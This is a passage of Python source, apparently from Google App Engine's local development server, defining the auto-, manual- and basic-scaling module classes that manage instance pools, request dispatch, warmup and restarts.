enable_php_remote_debugging,
python_config,
cloud_sql_config,
default_version_port,
port_registry,
request_data,
dispatcher,
max_instances,
use_mtime_file_watcher,
automatic_restarts,
allow_skipped_files,
external_api_port=None):
"""Initializer for AutoScalingModule.
Args:
module_configuration: An application_configuration.ModuleConfiguration
instance storing the configuration data for a module.
host: A string containing the host that any HTTP servers should bind to
e.g. "localhost".
balanced_port: An int specifying the port where the balanced module for
the pool should listen.
api_port: The port that APIServer listens for RPC requests on.
auth_domain: A string containing the auth domain to set in the environment
variables.
runtime_stderr_loglevel: An int representing the minimum logging level at
which runtime log messages should be written to stderr. See
devappserver2.py for possible values.
php_executable_path: A string containing the path to PHP execution e.g.
"/usr/bin/php-cgi".
enable_php_remote_debugging: A boolean indicating whether the PHP
interpreter should be started with XDebug remote debugging enabled.
python_config: A runtime_config_pb2.PythonConfig instance containing
Python runtime-specific configuration. If None then defaults are
used.
cloud_sql_config: A runtime_config_pb2.CloudSQL instance containing the
required configuration for local Google Cloud SQL development. If None
then Cloud SQL will not be available.
default_version_port: An int containing the port of the default version.
port_registry: A dispatcher.PortRegistry used to provide the Dispatcher
with a mapping of port to Module and Instance.
request_data: A wsgi_request_info.WSGIRequestInfo that will be provided
with request information for use by API stubs.
dispatcher: A Dispatcher instance that can be used to make HTTP requests.
max_instances: The maximum number of instances to create for this module.
If None then there is no limit on the number of created instances.
use_mtime_file_watcher: A bool containing whether to use mtime polling to
monitor file changes even if other options are available on the
current platform.
automatic_restarts: If True then instances will be restarted when a
file or configuration change that affects them is detected.
allow_skipped_files: If True then all files in the application's directory
are readable, even if they appear in a static handler or "skip_files"
directive.
external_api_port: An integer specifying the location of an external API
server.
"""
super(AutoScalingModule, self).__init__(module_configuration,
host,
balanced_port,
api_port,
auth_domain,
runtime_stderr_loglevel,
php_executable_path,
enable_php_remote_debugging,
python_config,
cloud_sql_config,
default_version_port,
port_registry,
request_data,
dispatcher,
max_instances,
use_mtime_file_watcher,
automatic_restarts,
allow_skipped_files,
external_api_port)
self._process_automatic_scaling(
self._module_configuration.automatic_scaling)
self._instances = set() # Protected by self._condition.
# A deque containing (time, num_outstanding_instance_requests) 2-tuples.
# This is used to track the maximum number of outstanding requests in a time
# period. Protected by self._condition.
self._outstanding_request_history = collections.deque()
self._num_outstanding_instance_requests = 0 # Protected by self._condition.
# The time when the last instance was quit in seconds since the epoch.
self._last_instance_quit_time = 0 # Protected by self._condition.
self._condition = threading.Condition() # Protects instance state.
self._instance_adjustment_thread = threading.Thread(
target=self._loop_adjusting_instances)
def start(self):
"""Start background management of the Module."""
self._balanced_module.start()
self._port_registry.add(self.balanced_port, self, None)
if self._watcher:
self._watcher.start()
self._instance_adjustment_thread.start()
def quit(self):
"""Stops the Module."""
self._quit_event.set()
self._instance_adjustment_thread.join()
# The instance adjustment thread depends on the balanced module and the
# watcher so wait for it to exit before quitting them.
if self._watcher:
self._watcher.quit()
self._balanced_module.quit()
with self._condition:
instances = self._instances
self._instances = set()
self._condition.notify_all()
for inst in instances:
inst.quit(force=True)
@property
def instances(self):
"""A set of all the instances currently in the Module."""
with self._condition:
return set(self._instances)
@property
def num_outstanding_instance_requests(self):
"""The number of requests that instances are currently handling."""
with self._condition:
return self._num_outstanding_instance_requests
def _handle_instance_request(self,
environ,
start_response,
url_map,
match,
request_id,
inst,
request_type):
"""Handles a request routed a particular Instance.
Args:
environ: An environ dict for the request as defined in PEP-333.
start_response: A function with semantics defined in PEP-333.
url_map: An appinfo.URLMap instance containing the configuration for the
handler that matched.
match: A re.MatchObject containing the result of the matched URL pattern.
request_id: A unique string id associated with the request.
inst: The instance.Instance to send the request to.
request_type: The type of the request. See instance.*_REQUEST module
constants.
Returns:
An iterable over strings containing the body of the HTTP response.
"""
if request_type != instance.READY_REQUEST:
with self._condition:
self._num_outstanding_instance_requests += 1
self._outstanding_request_history.append(
(time.time(), self.num_outstanding_instance_requests))
try:
logging.debug('Dispatching request to %s', inst)
return inst.handle(environ, start_response, url_map, match, request_id,
request_type)
finally:
with self._condition:
if request_type != instance.READY_REQUEST:
self._num_outstanding_instance_requests -= 1
self._condition.notify()
def _handle_script_request(self,
environ,
start_response,
url_map,
match,
request_id,
inst=None,
request_type=instance.NORMAL_REQUEST):
"""Handles a HTTP request that has matched a script handler.
Args:
environ: An environ dict for the request as defined in PEP-333.
start_response: A function with semantics defined in PEP-333.
url_map: An appinfo.URLMap instance containing the configuration for the
handler that matched.
match: A re.MatchObject containing the result of the matched URL pattern.
request_id: A unique string id associated with the request.
inst: The instance.Instance to send the request to. If None then an
appropriate instance.Instance will be chosen.
request_type: The type of the request. See instance.*_REQUEST module
constants.
Returns:
An iterable over strings containing the body of the HTTP response.
"""
if inst is not None:
return self._handle_instance_request(
environ, start_response, url_map, match, request_id, inst,
request_type)
with self._condition:
self._num_outstanding_instance_requests += 1
self._outstanding_request_history.append(
(time.time(), self.num_outstanding_instance_requests))
try:
start_time = time.time()
timeout_time = start_time + self._min_pending_latency
# Loop until an instance is available to handle the request.
while True:
if self._quit_event.is_set():
return self._error_response(environ, start_response, 404)
inst = self._choose_instance(timeout_time)
if not inst:
inst = self._add_instance(permit_warmup=False)
if not inst:
# No instance is available nor can a new one be created, so loop
# waiting for one to be free.
timeout_time = time.time() + 0.2
continue
try:
logging.debug('Dispatching request to %s after %0.4fs pending',
inst, time.time() - start_time)
return inst.handle(environ,
start_response,
url_map,
match,
request_id,
request_type)
except instance.CannotAcceptRequests:
continue
finally:
with self._condition:
self._num_outstanding_instance_requests -= 1
self._condition.notify()
def _add_instance(self, permit_warmup):
"""Creates and adds a new instance.Instance to the Module.
Args:
permit_warmup: If True then the new instance.Instance will be sent a new
warmup request if it is configured to receive them.
Returns:
The newly created instance.Instance. Returns None if no new instance
could be created because the maximum number of instances has already
been created.
"""
if self._max_instances is not None:
with self._condition:
if len(self._instances) >= self._max_instances:
return None
perform_warmup = permit_warmup and (
'warmup' in (self._module_configuration.inbound_services or []))
inst = self._instance_factory.new_instance(
self.generate_instance_id(),
expect_ready_request=perform_warmup)
with self._condition:
if self._quit_event.is_set():
return None
self._instances.add(inst)
if not inst.start():
return None
if perform_warmup:
self._async_warmup(inst)
else:
with self._condition:
self._condition.notify(self.max_instance_concurrent_requests)
logging.debug('Created instance: %s', inst)
return inst
@staticmethod
def generate_instance_id():
return ''.join(random.choice(_LOWER_HEX_DIGITS) for _ in range(36))
def _warmup(self, inst):
"""Send a warmup request to the given instance."""
try:
environ = self.build_request_environ(
'GET', '/_ah/warmup', [], '', '0.1.0.3', self.balanced_port,
fake_login=True)
self._handle_request(environ,
start_response_utils.null_start_response,
inst=inst,
request_type=instance.READY_REQUEST)
with self._condition:
self._condition.notify(self.max_instance_concurrent_requests)
except:
logging.exception('Internal error while handling warmup request.')
def _async_warmup(self, inst):
"""Asynchronously send a markup request to the given Instance."""
_THREAD_POOL.submit(self._warmup, inst)
def _trim_outstanding_request_history(self):
"""Removes obsolete entries from _outstanding_request_history."""
window_start = time.time() - self._REQUIRED_INSTANCE_WINDOW_SECONDS
with self._condition:
while self._outstanding_request_history:
t, _ = self._outstanding_request_history[0]
if t < window_start:
self._outstanding_request_history.popleft()
else:
break
def _get_num_required_instances(self):
"""Returns the number of Instances required to handle the request load."""
with self._condition:
self._trim_outstanding_request_history()
if not self._outstanding_request_history:
return 0
else:
peak_concurrent_requests = max(
current_requests
for (t, current_requests)
in self._outstanding_request_history)
return int(math.ceil(peak_concurrent_requests /
self.max_instance_concurrent_requests))
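# Worked example (hypothetical numbers, not from the original source): with a
# peak of 25 concurrent requests inside the 60-second window and
# max_instance_concurrent_requests == 8, ceil(25 / 8.0) == 4 instances are
# considered required; an empty history yields 0.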
def _split_instances(self):
"""Returns a 2-tuple representing the required and extra Instances.
Returns:
A 2-tuple of (required_instances, not_required_instances):
required_instances: The set of the instance.Instances, in a state that
can handle requests, required to handle the current
request load.
not_required_instances: The set of the Instances contained in this
Module that are not required.
"""
with self._condition:
num_required_instances = self._get_num_required_instances()
available = [inst for inst in self._instances
if inst.can_accept_requests]
available.sort(key=lambda inst: -inst.num_outstanding_requests)
required = set(available[:num_required_instances])
return required, self._instances - required
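# Note (restating the split above): "required" is the busiest
# num_required_instances instances among those that can currently accept
# requests; every other instance in self._instances, including ones that
# cannot accept requests yet, lands in not_required_instances.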
def _choose_instance(self, timeout_time):
"""Returns the best Instance to handle a request or None if all are busy."""
with self._condition:
while time.time() < timeout_time:
required_instances, not_required_instances = self._split_instances()
if required_instances:
# Pick the instance with the most remaining capacity to handle
# requests.
required_instances = sorted(
required_instances,
key=lambda inst: inst.remaining_request_capacity)
if required_instances[-1].remaining_request_capacity:
return required_instances[-1]
available_instances = [inst for inst in not_required_instances
if inst.remaining_request_capacity > 0 and
inst.can_accept_requests]
if available_instances:
# Pick the instance with the *least* capacity to handle requests
# to avoid using unnecessary idle instances.
available_instances.sort(
key=lambda instance: instance.num_outstanding_requests)
return available_instances[-1]
else:
self._condition.wait(timeout_time - time.time())
return None
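# Selection order used above (descriptive note): prefer the "required"
# instance with the most remaining capacity; otherwise pick the busiest
# not-required instance that can still take a request, so idle instances stay
# idle and can later be reaped by _adjust_instances; if nothing is free, block
# on the condition until timeout_time and return None.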
def _adjust_instances(self):
"""Creates new Instances or deletes idle Instances based on current load."""
now = time.time()
with self._condition:
_, not_required_instances = self._split_instances()
if len(not_required_instances) < self._min_idle_instances:
self._add_instance(permit_warmup=True)
elif (len(not_required_instances) > self._max_idle_instances and
now >
(self._last_instance_quit_time + self._MIN_SECONDS_BETWEEN_QUITS)):
for inst in not_required_instances:
if not inst.num_outstanding_requests:
try:
inst.quit()
except instance.CannotQuitServingInstance:
pass
else:
self._last_instance_quit_time = now
logging.debug('Quit instance: %s', inst)
with self._condition:
self._instances.discard(inst)
break
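# Scaling policy sketch (restating the code above): when fewer than
# _min_idle_instances instances are surplus to current load, one
# warmup-enabled instance is added per pass; when more than
# _max_idle_instances are surplus, at most one instance with no outstanding
# requests is quit per pass, and never more often than once every
# _MIN_SECONDS_BETWEEN_QUITS seconds.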
def _loop_adjusting_instances(self):
"""Loops until the Module exits, reloading, adding or removing Instances."""
while not self._quit_event.is_set():
if self.ready:
if self._automatic_restarts:
self._handle_changes()
self._adjust_instances()
self._quit_event.wait(timeout=1)
def __call__(self, environ, start_response):
return self._handle_request(environ, start_response)
class ManualScalingModule(Module):
"""A pool of instances that is manually-scaled."""
_DEFAULT_MANUAL_SCALING = appinfo.ManualScaling(instances='1')
_MAX_REQUEST_WAIT_TIME = 10
@classmethod
def _populate_default_manual_scaling(cls, manual_scaling):
for attribute in manual_scaling.ATTRIBUTES:
if getattr(manual_scaling, attribute) in ('manual', None):
setattr(manual_scaling, attribute,
getattr(cls._DEFAULT_MANUAL_SCALING, attribute))
def _process_manual_scaling(self, manual_scaling):
if manual_scaling:
self._populate_default_manual_scaling(manual_scaling)
else:
manual_scaling = self._DEFAULT_MANUAL_SCALING
self._initial_num_instances = int(manual_scaling.instances)
def __init__(self,
module_configuration,
host,
balanced_port,
api_port,
auth_domain,
runtime_stderr_loglevel,
php_executable_path,
enable_php_remote_debugging,
python_config,
cloud_sql_config,
default_version_port,
port_registry,
request_data,
dispatcher,
max_instances,
use_mtime_file_watcher,
automatic_restarts,
allow_skipped_files,
external_api_port=None):
"""Initializer for ManualScalingModule.
Args:
module_configuration: An application_configuration.ModuleConfiguration
instance storing the configuration data for a module.
host: A string containing the host that any HTTP servers should bind to
e.g. "localhost".
balanced_port: An int specifying the port where the balanced module for
the pool should listen.
api_port: The port that APIServer listens for RPC requests on.
auth_domain: A string containing the auth domain to set in the environment
variables.
runtime_stderr_loglevel: An int representing the minimum logging level at
which runtime log messages should be written to stderr. See
devappserver2.py for possible values.
php_executable_path: A string containing the path to PHP execution e.g.
"/usr/bin/php-cgi".
enable_php_remote_debugging: A boolean indicating whether the PHP
interpreter should be started with XDebug remote debugging enabled.
python_config: A runtime_config_pb2.PythonConfig instance containing
Python runtime-specific configuration. If None then defaults are
used.
cloud_sql_config: A runtime_config_pb2.CloudSQL instance containing the
required configuration for local Google Cloud SQL development. If None
then Cloud SQL will not be available.
default_version_port: An int containing the port of the default version.
port_registry: A dispatcher.PortRegistry used to provide the Dispatcher
with a mapping of port to Module and Instance.
request_data: A wsgi_request_info.WSGIRequestInfo that will be provided
with request information for use by API stubs.
dispatcher: A Dispatcher instance that can be used to make HTTP requests.
max_instances: The maximum number of instances to create for this module.
If None then there is no limit on the number of created instances.
use_mtime_file_watcher: A bool containing whether to use mtime polling to
monitor file changes even if other options are available on the
current platform.
automatic_restarts: If True then instances will be restarted when a
file or configuration change that affects them is detected.
allow_skipped_files: If True then all files in the application's directory
are readable, even if they appear in a static handler or "skip_files"
directive.
external_api_port: An integer specifying the location of an external API
server.
"""
super(ManualScalingModule, self).__init__(module_configuration,
host,
balanced_port,
api_port,
auth_domain,
runtime_stderr_loglevel,
php_executable_path,
enable_php_remote_debugging,
python_config,
cloud_sql_config,
default_version_port,
port_registry,
request_data,
dispatcher,
max_instances,
use_mtime_file_watcher,
automatic_restarts,
allow_skipped_files,
external_api_port)
self._process_manual_scaling(module_configuration.manual_scaling)
self._instances = [] # Protected by self._condition.
self._wsgi_servers = [] # Protected by self._condition.
# Whether the module has been stopped. Protected by self._condition.
self._suspended = False
self._condition = threading.Condition() # Protects instance state.
# Serializes operations that modify the serving state of or number of
# instances.
self._instances_change_lock = threading.RLock()
self._change_watcher_thread = threading.Thread(
target=self._loop_watching_for_changes)
def start(self):
"""Start background management of the Module."""
self._balanced_module.start()
self._port_registry.add(self.balanced_port, self, None)
if self._watcher:
self._watcher.start()
self._change_watcher_thread.start()
with self._instances_change_lock:
if self._max_instances is not None:
initial_num_instances = min(self._max_instances,
self._initial_num_instances)
else:
initial_num_instances = self._initial_num_instances
for _ in xrange(initial_num_instances):
self._add_instance()
def quit(self):
"""Stops the Module."""
self._quit_event.set()
self._change_watcher_thread.join()
# The change watcher thread depends on the balanced module and the
# watcher so wait for it to exit before quitting them.
if self._watcher:
self._watcher.quit()
self._balanced_module.quit()
for wsgi_servr in self._wsgi_servers:
wsgi_servr.quit()
with self._condition:
instances = self._instances
self._instances = []
self._condition.notify_all()
for inst in instances:
inst.quit(force=True)
def get_instance_port(self, instance_id):
"""Returns the port of the HTTP server for an instance."""
try:
instance_id = int(instance_id)
except ValueError:
raise request_info.InvalidInstanceIdError()
with self._condition:
if 0 <= instance_id < len(self._instances):
wsgi_servr = self._wsgi_servers[instance_id]
else:
raise request_info.InvalidInstanceIdError()
return wsgi_servr.port
@property
def instances(self):
"""A set of all the instances currently in the Module."""
with self._condition:
return set(self._instances)
def _handle_instance_request(self,
environ,
start_response,
url_map,
match,
request_id,
inst,
request_type):
"""Handles a request routed a particular Instance.
Args:
environ: An environ dict for the request as defined in PEP-333.
start_response: A function with semantics defined in PEP-333.
url_map: An appinfo.URLMap instance containing the configuration for the
handler that matched.
match: A re.MatchObject containing the result of the matched URL pattern.
request_id: A unique string id associated with the request.
inst: The instance.Instance to send the request to.
request_type: The type of the request. See instance.*_REQUEST module
constants.
Returns:
An iterable over strings containing the body of the HTTP response.
"""
start_time = time.time()
timeout_time = start_time + self._MAX_REQUEST_WAIT_TIME
try:
while time.time() < timeout_time:
logging.debug('Dispatching request to %s after %0.4fs pending',
inst, time.time() - start_time)
try:
return inst.handle(environ, start_response, url_map, match,
request_id, request_type)
except instance.CannotAcceptRequests:
pass
inst.wait(timeout_time)
if inst.has_quit:
return self._error_response(environ, start_response, 503)
else:
return self._error_response(environ, start_response, 503)
finally:
with self._condition:
self._condition.notify()
def _handle_script_request(self,
environ,
start_response,
url_map,
match,
request_id,
inst=None,
request_type=instance.NORMAL_REQUEST):
"""Handles a HTTP request that has matched a script handler.
Args:
environ: An environ dict for the request as defined in PEP-333.
start_response: A function with semantics defined in PEP-333.
url_map: An appinfo.URLMap instance containing the configuration for the
handler that matched.
match: A re.MatchObject containing the result of the matched URL pattern.
request_id: A unique string id associated with the request.
inst: The instance.Instance to send the request to. If None then an
appropriate instance.Instance will be chosen.
request_type: The type of the request. See instance.*_REQUEST module
constants.
Returns:
An iterable over strings containing the body of the HTTP response.
"""
if ((request_type in (instance.NORMAL_REQUEST, instance.READY_REQUEST) and
self._suspended) or self._quit_event.is_set()):
return self._error_response(environ, start_response, 404)
if self._module_configuration.is_backend:
environ['BACKEND_ID'] = self._module_configuration.module_name
else:
environ['BACKEND_ID'] = (
self._module_configuration.version_id.split('.', 1)[0])
if inst is not None:
return self._handle_instance_request(
environ, start_response, url_map, match, request_id, inst,
request_type)
start_time = time.time()
timeout_time = start_time + self._MAX_REQUEST_WAIT_TIME
while time.time() < timeout_time:
if ((request_type in (instance.NORMAL_REQUEST, instance.READY_REQUEST) and
self._suspended) or self._quit_event.is_set()):
return self._error_response(environ, start_response, 404)
inst = self._choose_instance(timeout_time)
if inst:
try:
logging.debug('Dispatching request to %s after %0.4fs pending',
inst, time.time() - start_time)
return inst.handle(environ, start_response, url_map, match,
request_id, request_type)
except instance.CannotAcceptRequests:
continue
finally:
with self._condition:
self._condition.notify()
else:
return self._error_response(environ, start_response, 503)
def _add_instance(self):
"""Creates and adds a new instance.Instance to the Module.
This must be called with _instances_change_lock held.
"""
instance_id = self.get_num_instances()
assert self._max_instances is None or instance_id < self._max_instances
inst = self._instance_factory.new_instance(instance_id,
expect_ready_request=True)
wsgi_servr = wsgi_server.WsgiServer(
(self._host, 0), functools.partial(self._handle_request, inst=inst))
wsgi_servr.start()
self._port_registry.add(wsgi_servr.port, self, inst)
with self._condition:
if self._quit_event.is_set():
return
self._wsgi_servers.append(wsgi_servr)
self._instances.append(inst)
suspended = self._suspended
if not suspended:
self._async_start_instance(wsgi_servr, inst)
def _async_start_instance(self, wsgi_servr, inst):
_THREAD_POOL.submit(self._start_instance, wsgi_servr, inst)
def _start_instance(self, wsgi_servr, inst):
if inst.start():
logging.debug('Started instance: %s at http://%s:%s', inst, self.host,
wsgi_servr.port)
try:
environ = self.build_request_environ(
'GET', '/_ah/start', [], '', '0.1.0.3', wsgi_servr.port,
fake_login=True)
self._handle_request(environ,
start_response_utils.null_start_response,
inst=inst,
request_type=instance.READY_REQUEST)
logging.debug('Sent start request: %s', inst)
with self._condition:
self._condition.notify(self.max_instance_concurrent_requests)
except:
logging.exception('Internal error while handling start request.')
def _choose_instance(self, timeout_time):
"""Returns an Instance to handle a request or None if all are busy."""
with self._condition:
while time.time() < timeout_time:
for inst in self._instances:
if inst.can_accept_requests:
return inst
self._condition.wait(timeout_time - time.time())
return None
def _handle_changes(self):
"""Handle file or configuration changes."""
# Always check for config and file changes because checking also clears
# pending changes.
config_changes = self._module_configuration.check_for_updates()
has_file_changes = self._watcher.has_changes()
if application_configuration.HANDLERS_CHANGED in config_changes:
handlers = self._create_url_handlers()
with self._handler_lock:
self._handlers = handlers
if has_file_changes:
self._instance_factory.files_changed()
if config_changes & _RESTART_INSTANCES_CONFIG_CHANGES:
self._instance_factory.configuration_changed(config_changes)
if config_changes & _RESTART_INSTANCES_CONFIG_CHANGES or has_file_changes:
with self._instances_change_lock:
if not self._suspended:
self.restart()
def _loop_watching_for_changes(self):
"""Loops until the InstancePool is done watching for file changes."""
while not self._quit_event.is_set():
if self.ready:
if self._automatic_restarts:
self._handle_changes()
self._quit_event.wait(timeout=1)
def get_num_instances(self):
with self._instances_change_lock:
with self._condition:
return len(self._instances)
def set_num_instances(self, instances):
if self._max_instances is not None:
instances = min(instances, self._max_instances)
with self._instances_change_lock:
with self._condition:
running_instances = self.get_num_instances()
if running_instances > instances:
wsgi_servers_to_quit = self._wsgi_servers[instances:]
del self._wsgi_servers[instances:]
instances_to_quit = self._instances[instances:]
del self._instances[instances:]
if running_instances < instances:
for _ in xrange(instances - running_instances):
self._add_instance()
if running_instances > instances:
for inst, wsgi_servr in zip(instances_to_quit, wsgi_servers_to_quit):
self._async_quit_instance(inst, wsgi_servr)
def _async_quit_instance(self, inst, wsgi_servr):
_THREAD_POOL.submit(self._quit_instance, inst, wsgi_servr)
def _quit_instance(self, inst, wsgi_servr):
port = wsgi_servr.port
wsgi_servr.quit()
inst.quit(expect_shutdown=True)
self._shutdown_instance(inst, port)
def suspend(self):
"""Suspends serving for this module, quitting all running instances."""
with self._instances_change_lock:
if self._suspended:
raise request_info.ModuleAlreadyStoppedError()
self._suspended = True
with self._condition:
instances_to_stop = zip(self._instances, self._wsgi_servers)
for wsgi_servr in self._wsgi_servers:
wsgi_servr.set_error(404)
for inst, wsgi_servr in instances_to_stop:
self._async_suspend_instance(inst, wsgi_servr.port)
def _async_suspend_instance(self, inst, port):
_THREAD_POOL.submit(self._suspend_instance, inst, port)
def _suspend_instance(self, inst, port):
inst.quit(expect_shutdown=True)
self._shutdown_instance(inst, port)
def resume(self):
"""Resumes serving for this module."""
with self._instances_change_lock:
if not self._suspended:
raise request_info.ModuleAlreadyStartedError()
self._suspended = False
with self._condition:
if self._quit_event.is_set():
return
wsgi_servers = self._wsgi_servers
instances_to_start = []
for instance_id, wsgi_servr in enumerate(wsgi_servers):
inst = self._instance_factory.new_instance(instance_id,
expect_ready_request=True)
wsgi_servr.set_app(functools.partial(self._handle_request, inst=inst))
self._port_registry.add(wsgi_servr.port, self, inst)
with self._condition:
if self._quit_event.is_set():
return
self._instances[instance_id] = inst
instances_to_start.append((wsgi_servr, inst))
for wsgi_servr, inst in instances_to_start:
self._async_start_instance(wsgi_servr, inst)
def restart(self):
"""Restarts the the module, replacing all running instances."""
with self._instances_change_lock:
with self._condition:
if self._quit_event.is_set():
return
instances_to_stop = self._instances[:]
wsgi_servers = self._wsgi_servers[:]
instances_to_start = []
for instance_id, wsgi_servr in enumerate(wsgi_servers):
inst = self._instance_factory.new_instance(instance_id,
expect_ready_request=True)
wsgi_servr.set_app(functools.partial(self._handle_request, inst=inst))
self._port_registry.add(wsgi_servr.port, self, inst)
instances_to_start.append(inst)
with self._condition:
if self._quit_event.is_set():
return
self._instances[:] = instances_to_start
for inst, wsgi_servr in zip(instances_to_stop, wsgi_servers):
self._async_suspend_instance(inst, wsgi_servr.port)
for wsgi_servr, inst in zip(wsgi_servers, instances_to_start):
self._async_start_instance(wsgi_servr, inst)
def get_instance(self, instance_id):
"""Returns the instance with the provided instance ID."""
try:
with self._condition:
return self._instances[int(instance_id)]
except (ValueError, IndexError):
raise request_info.InvalidInstanceIdError()
def __call__(self, environ, start_response, inst=None):
return self._handle_request(environ, start_response, inst)
@property
def supports_individually_addressable_instances(self):
return True
class BasicScalingModule(Module):
"""A pool of instances that is basic-scaled."""
_DEFAULT_BASIC_SCALING = appinfo.BasicScaling(max_instances='1',
idle_timeout='15m')
_MAX_REQUEST_WAIT_TIME = 10
@staticmethod
def _parse_idle_timeout(timing):
"""Parse a idle timeout string into an int of the value in seconds.
Args:
timing: A str of the form 1m or 10s.
Returns:
An int representation of the value in seconds.
"""
if timing.endswith('m'):
return int(timing[:-1]) * 60
else:
return int(timing[:-1])
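# Parsing sketch for the '<n>m' / '<n>s' forms accepted above
# (illustrative values only):
#   _parse_idle_timeout('15m')  ->  900
#   _parse_idle_timeout('30s')  ->  30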
@classmethod
def _populate_default_basic_scaling(cls, basic_scaling):
for attribute in basic_scaling.ATTRIBUTES:
if getattr(basic_scaling, attribute) in ('basic', None):
setattr(basic_scaling, attribute,
getattr(cls._DEFAULT_BASIC_SCALING, attribute))
def _process_basic_scaling(self, basic_scaling):
if basic_scaling:
self._populate_default_basic_scaling(basic_scaling)
else:
basic_scaling = self._DEFAULT_BASIC_SCALING
if self._max_instances is not None:
self._max_instances = min(self._max_instances,
int(basic_scaling.max_instances))
else:
self._max_instances = int(basic_scaling.max_instances)
self._instance_idle_timeout = self._parse_idle_timeout(
basic_scaling.idle_timeout)
def __init__(self,
module_configuration,
host,
balanced_port,
api_port,
auth_domain,
runtime_stderr_loglevel,
php_executable_path,
enable_php_remote_debugging,
python_config,
cloud_sql_config,
default_version_port,
port_registry,
request_data,
dispatcher,
max_instances,
use_mtime_file_watcher,
automatic_restarts,
allow_skipped_files,
external_api_port=None):
"""Initializer for BasicScalingModule.
Args:
module_configuration: An application_configuration.ModuleConfiguration
instance storing the configuration data for a module.
host: A string containing the host that any HTTP servers should bind to
e.g. "localhost".
balanced_port: An int specifying the port where the balanced module for
the pool should listen.
api_port: The port that APIServer listens for RPC requests on.
auth_domain: A string containing the auth domain to set in the environment
variables.
runtime_stderr_loglevel: An int representing the minimum logging level at
which runtime log messages should be written to stderr. See
devappserver2.py for possible values.
php_executable_path: A string containing the path to PHP execution e.g.
"/usr/bin/php-cgi".
enable_php_remote_debugging: A boolean indicating whether the PHP
interpreter should be started with XDebug remote debugging enabled.
python_config: A runtime_config_pb2.PythonConfig instance containing
Python runtime-specific configuration. If None then defaults are
used.
cloud_sql_config: A runtime_config_pb2.CloudSQL instance containing the
required configuration for local Google Cloud SQL development. If None
then Cloud SQL will not be available.
default_version_port: An int containing the port of the default version.
port_registry: A dispatcher.PortRegistry used to provide the Dispatcher
with a mapping of port to Module and Instance.
request_data: A wsgi_request_info.WSGIRequestInfo that will be provided
with request information for use by API stubs.
dispatcher: A Dispatcher instance that can be used to make HTTP requests.
max_instances: The maximum number of instances to create for this module.
If None then there is no limit on the number of created instances.
use_mtime_file_watcher: A bool containing whether to use mtime polling to
monitor file changes even if other options are available on the
current platform.
automatic_restarts: If True then instances will be restarted when a
file or configuration change that affects them is detected.
allow_skipped_files: If True then all files in the application's directory
are readable, even if they appear in a static handler or "skip_files"
directive.
external_api_port: An integer specifying the location of an external API
server.
"""
super(BasicScalingModule, self).__init__(module_configuration,
host,
balanced_port,
api_port,
auth_domain,
runtime_stderr_loglevel,
php_executable_path,
enable_php_remote_debugging,
python_config,
cloud_sql_config,
default_version_port,
port_registry,
request_data,
dispatcher,
max_instances,
use_mtime_file_watcher,
automatic_restarts,
allow_skipped_files,
external_api_port)
self._process_basic_scaling(module_configuration.basic_scaling)
self._instances = [] # Protected by self._condition.
self._wsgi_servers = [] # Protected by self._condition.
# A list of booleans signifying whether the corresponding instance in
# self._instances has been or is being started.
self._instance_running = [] # Protected by self._condition.
for instance_id in xrange(self._max_instances):
inst = self._instance_factory.new_instance(instance_id,
expect_ready_request=True)
self._instances.append(inst)
self._wsgi_servers.append(wsgi_server.WsgiServer(
(self._host, 0), functools.partial(self._handle_request, inst=inst)))
self._instance_running.append(False)
self._condition = threading.Condition() # Protects instance state.
self._change_watcher_thread = threading.Thread(
target=self._loop_watching_for_changes_and_idle_instances)
def start(self):
"""Start background management of the Module."""
self._balanced_module.start()
self._port_registry.add(self.balanced_port, self, None)
if self._watcher:
self._watcher.start()
self._change_watcher_thread.start()
for wsgi_servr, inst in zip(self._wsgi_servers, self._instances):
wsgi_servr.start()
self._port_registry.add(wsgi_servr.port, self, inst)
def quit(self):
"""Stops the Module."""
self._quit_event.set()
self._change_watcher_thread.join()
# The change watcher thread depends on the balanced module and the
# watcher so wait for it to exit before quitting them.
if self._watcher:
self._watcher.quit()
self._balanced_module.quit()
for wsgi_servr in self._wsgi_servers:
wsgi_servr.quit()
with self._condition:
instances = self._instances
self._instances = []
self._condition.notify_all()
for inst in instances:
inst.quit(force=True)
def get_instance_port(self, instance_id):
"""Returns the port of the HTTP server for an instance."""
try:
instance_id = int(instance_id)
except ValueError:
raise request_info.InvalidInstanceIdError()
with self._condition:
if 0 <= instance_id < len(self._instances):
wsgi_servr = self._wsgi_servers[instance_id]
else:
raise request_info.InvalidInstanceIdError()
return wsgi_servr.port
@property
def instances(self):
"""A set of all the instances currently in the Module."""
with self._condition:
return set(self._instances)
def _handle_instance_request(self,
environ,
start_response,
url_map,
match,
request_id,
inst,
request_type):
"""Handles a request routed a particular Instance.
Args:
environ: An environ dict for the request as defined in PEP-333.
start_response: A function with semantics defined in PEP-333.
url_map: An appinfo.URLMap instance containing the configuration for the
handler that matched.
match: A re.MatchObject containing the result of the matched URL pattern.
request_id: A unique string id associated with the request.
inst: The instance.Instance to send the request to.
request_type: The type of the request. See instance.*_REQUEST module
constants.
Returns:
An iterable over strings containing the body of the HTTP response.
"""
instance_id = inst.instance_id
start_time = time.time()
timeout_time = start_time + self._MAX_REQUEST_WAIT_TIME
try:
while time.time() < timeout_time:
logging.debug('Dispatching request to %s after %0.4fs pending',
inst, time.time() - start_time)
try:
return inst.handle(environ, start_response, url_map, match,
request_id, request_type)
except instance.CannotAcceptRequests:
pass
if inst.has_quit:
return self._error_response(environ, start_response, 503)
with self._condition:
if self._instance_running[instance_id]:
should_start = False
else:
self._instance_running[instance_id] = True
should_start = True
if should_start:
self._start_instance(instance_id)
else:
inst.wait(timeout_time)
else:
return self._error_response(environ, start_response, 503)
finally:
with self._condition:
self._condition.notify()
def _handle_script_request(self,
environ,
start_response,
url_map,
match,
request_id,
inst=None,
request_type=instance.NORMAL_REQUEST):
"""Handles a HTTP request that has matched a script handler.
Args:
environ: An environ dict for the request as defined in PEP-333.
start_response: A function with semantics defined in PEP-333.
url_map: An appinfo.URLMap instance containing the configuration for the
handler that matched.
match: A re.MatchObject containing the result of the matched URL pattern.
request_id: A unique string id associated with the request.
inst: The instance.Instance to send the request to. If None then an
appropriate instance.Instance will be chosen.
request_type: The type of the request. See instance.*_REQUEST module
constants.
Returns:
An iterable over strings containing the body of the HTTP response.
"""
if self._quit_event.is_set():
return self._error_response(environ, start_response, 404)
if self._module_configuration.is_backend:
environ['BACKEND_ID'] = self._module_configuration.module_name
else:
environ['BACKEND_ID'] = (
self._module_configuration.version_id.split('.', 1)[0])
if inst is not None:
return self._handle_instance_request(
environ, start_response, url_map, match, request_id, inst,
request_type)
start_time = time.time()
timeout_time = start_time + self._MAX_REQUEST_WAIT_TIME
